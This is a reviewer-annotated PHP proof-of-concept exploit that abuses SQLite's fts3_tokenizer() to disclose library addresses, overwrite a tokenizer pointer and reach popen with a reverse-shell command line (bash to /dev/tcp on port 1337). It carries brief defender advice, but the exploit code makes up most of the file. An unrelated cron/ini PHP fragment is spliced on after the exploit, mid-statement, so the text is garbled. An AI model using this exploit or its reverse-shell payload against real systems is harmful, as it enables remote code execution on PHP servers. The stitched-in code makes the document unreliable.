// NOTE(review): proof-of-concept fragment. $fake_module, flip() and
// my_ini_set() are used below but are defined outside the visible part, and
// the disassembly excerpt that follows also starts before the visible part.
// Every offset is hard-coded for one particular set of library builds.
//
// What the code relies on: fts3_tokenizer() exchanges tokenizer-module
// pointers as BLOBs with whoever can run SQL. The one-argument call returns
// the registered pointer; the two-argument call stores a caller-supplied one.
//
// Defender notes: SQLite later disabled this legacy literal-argument
// behaviour by default (it is re-enabled only through
// SQLITE_DBCONFIG_ENABLE_FTS3_TOKENIZER / SQLITE_ENABLE_FTS3_TOKENIZER), so
// confirm the deployed build keeps it off. Treat fts3_tokenizer( in
// application SQL or query logs as a review trigger, and do not let
// untrusted callers run arbitrary SQL.

// .text:00000000002F138F mov [rsp+88h+var_58], rdx
// .text:00000000002F1394 mov rax, fs:28h
// .text:00000000002F139D mov [rsp+88h+var_40], rax
// .text:00000000002F13A2 xor eax, eax
// .text:00000000002F13A4 mov [rsp+88h+var_50], rcx
// .text:00000000002F13A9 mov [rsp+88h+var_48], 0
// .text:00000000002F13B2 call _popen
// Offset that is later added to $libphp_base; it lies just before the listed
// instructions, which end in a call to _popen.
$system = 0x2f137a;
// libsqlite3
// Offsets subtracted from / added to the libsqlite3 load base below.
$simpleTokenizerModule = 0x2c1be0;
$simpleCreate = 0x29400;
// Private in-memory database: nothing is read from or written to disk here.
$db = new SQLite3(":memory:");
if (isset($_GET['base'])) { // step two
    // Second request: the hex value printed by step one comes back in the
    // 'base' query parameter.
    $libmysqlnd_base = hexdec($_GET['base']);
    $stage = $libmysqlnd_base + $fake_module;
    // flip() is not shown; presumably it reverses the hex string's byte
    // order so the BLOB matches in-memory pointer layout -- confirm.
    $bomb = flip(dechex($stage));
    // Three statements in one exec(): register the computed pointer under the
    // name 'simple', create an FTS3 virtual table, then insert one row whose
    // text is a bash command line. Presumably the insert is where FTS3 uses
    // the replaced tokenizer pointer -- confirm against the SQLite build.
    $db->exec("select fts3_tokenizer('simple', x'{$bomb}');\n create virtual table a using fts3;\n insert into a values('bash -c \"bash>/dev/tcp/127.1/1337 0<&1\"')");
} else { // step one
    // First request: read the registered 'simple' tokenizer pointer as hex.
    // This discloses an address inside libsqlite3.
    $row = $db->query("select hex(fts3_tokenizer('simple')) addr;")->fetchArray();
    $leaked_addr = $row['addr'];
    $db->close();
    $addr = hexdec(flip($leaked_addr));
    // Load base = disclosed pointer minus the module's offset in the library.
    $libsqlite3_base = $addr - $simpleTokenizerModule;
    // The other bases are taken at fixed distances from libsqlite3; this
    // assumes the libraries are mapped at constant offsets from one another.
    $libphp_base = $libsqlite3_base + 0x6234000;
    $libmysqlnd_base = $libsqlite3_base + 0x113a000;
    $simple_create = $libsqlite3_base + $simpleCreate;
    // Stores two computed addresses as values of mysqlnd ini settings.
    // NOTE(review): my_ini_set() is not shown; presumably the in-memory
    // storage of these settings is what $fake_module refers to -- confirm.
    my_ini_set(array('mysqlnd.net_cmd_buffer_size' => $simple_create, 'mysqlnd.log_mask' => $libphp_base + $system));
    // Ends the request, returning the computed libmysqlnd base as hex; step
    // two expects that value in $_GET['base'], so the two requests presumably
    // have to be served by a process with the same memory layout.
    die(dechex($libmysqlnd_base));
}
$offset = 24 * 60 * 60; } if ($period == "weekly") { $offset = 7 * 24 * 60 * 60; } if ($period == "monthly") { $offset = 4 * 7 * 24 * 60 * 60; } if (preg_match('/^\\d+/', $period)) { // If is digits $offset = (int) $period; // Set to int } $ref = $tim + $offset; // Create new repeat time marker my_ini_set($file, $key, 'ref', $ref); // Save to ini file for later use // There are two file types that can be run browser or local CLI example: // http://localhost/drupal/cron.php // ..\..\plugins\dtdns_updater\dtdns_updater.php // A user specifies only the path/filename if (preg_match('/^http/', $path)) { // Is it a browser address $dummy = @file($path); // Yes: Run on Server, $dummy not used if ($logging) { cron_log($path); // Save to log and add time } } else { // No: Hence run local PHP script